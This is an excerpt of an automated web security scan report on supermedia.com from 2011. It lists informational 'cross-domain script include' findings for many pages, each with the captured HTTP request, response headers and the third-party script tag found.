Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762062|check#true#1296760262; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:09:36 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 25172


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>About SuperMedia | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.283. https://www.supermedia.com/about-us/corporate-profile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /about-us/corporate-profile

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us/corporate-profile HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:35:11 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Corporate Profile | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.284. https://www.supermedia.com/about-us/executive-team  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /about-us/executive-team

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us/executive-team HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:35:11 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Executive Team | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.285. https://www.supermedia.com/about-us/our-clients  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /about-us/our-clients

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us/our-clients HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:35:14 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Clients | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.286. https://www.supermedia.com/advertising-goals  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /advertising-goals

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /advertising-goals HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:31 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Advertising Goals | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.287. https://www.supermedia.com/business-listings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /business-listings

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-listings HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:28:57 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.288. https://www.supermedia.com/business-listings/coupons  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /business-listings/coupons

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-listings/coupons HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:06 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Coupons | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.289. https://www.supermedia.com/business-listings/listing-enhancements-packages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /business-listings/listing-enhancements-packages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-listings/listing-enhancements-packages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:05 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Listing Click Packages | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.290. https://www.supermedia.com/careers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /careers

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /careers HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:55 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Careers</title>


<link type="text/css" rel="stylesh
...[SNIP]...
<!--
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at https://accounts.brightcove.com/en/terms-and-conditions/.
-->

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.291. https://www.supermedia.com/careers/compensation-benefits  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /careers/compensation-benefits

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /careers/compensation-benefits HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:32 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Compensation and Benefits | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.292. https://www.supermedia.com/careers/core-values  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /careers/core-values

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /careers/core-values HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:32 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Careers Core Values | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.293. https://www.supermedia.com/careers/employees-retirees  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /careers/employees-retirees

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /careers/employees-retirees HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Employees & Retirees | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.294. https://www.supermedia.com/careers/job-search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /careers/job-search

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /careers/job-search HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online advertising Sales jobs and new media careers at SuperMedia</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.295. https://www.supermedia.com/careers/professional-development  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /careers/professional-development

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /careers/professional-development HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:33 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Professional Development | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.296. https://www.supermedia.com/client-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /client-solutions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /client-solutions HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:19 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Client Solutions | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.297. https://www.supermedia.com/client-solutions/client-stories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /client-solutions/client-stories

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /client-solutions/client-stories HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:55 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Client Stories Sign Up | SuperMedia.com Advertising</title>



...[SNIP]...
<!--
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at http://corp.brightcove.com/legal/terms_publisher.cfm.
-->

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.298. https://www.supermedia.com/client-solutions/local-retail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /client-solutions/local-retail

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /client-solutions/local-retail HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:09 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Retail Advertising | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.299. https://www.supermedia.com/client-solutions/local-service  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /client-solutions/local-service

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /client-solutions/local-service HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:58 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Service Providers | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.300. https://www.supermedia.com/client-solutions/national-brand-agencies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /client-solutions/national-brand-agencies

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /client-solutions/national-brand-agencies HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:17 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>National Brand and Agency Building | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.301. https://www.supermedia.com/client-solutions/share-the-wealth  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /client-solutions/share-the-wealth

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /client-solutions/share-the-wealth HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:23 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Share the wealth</title>


<link type="text/css" rel
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.302. https://www.supermedia.com/client-solutions/web-based-business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /client-solutions/web-based-business

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /client-solutions/web-based-business HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:17 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Web Based Business Advertising | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.303. https://www.supermedia.com/community/barter-network  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /community/barter-network

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/barter-network HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
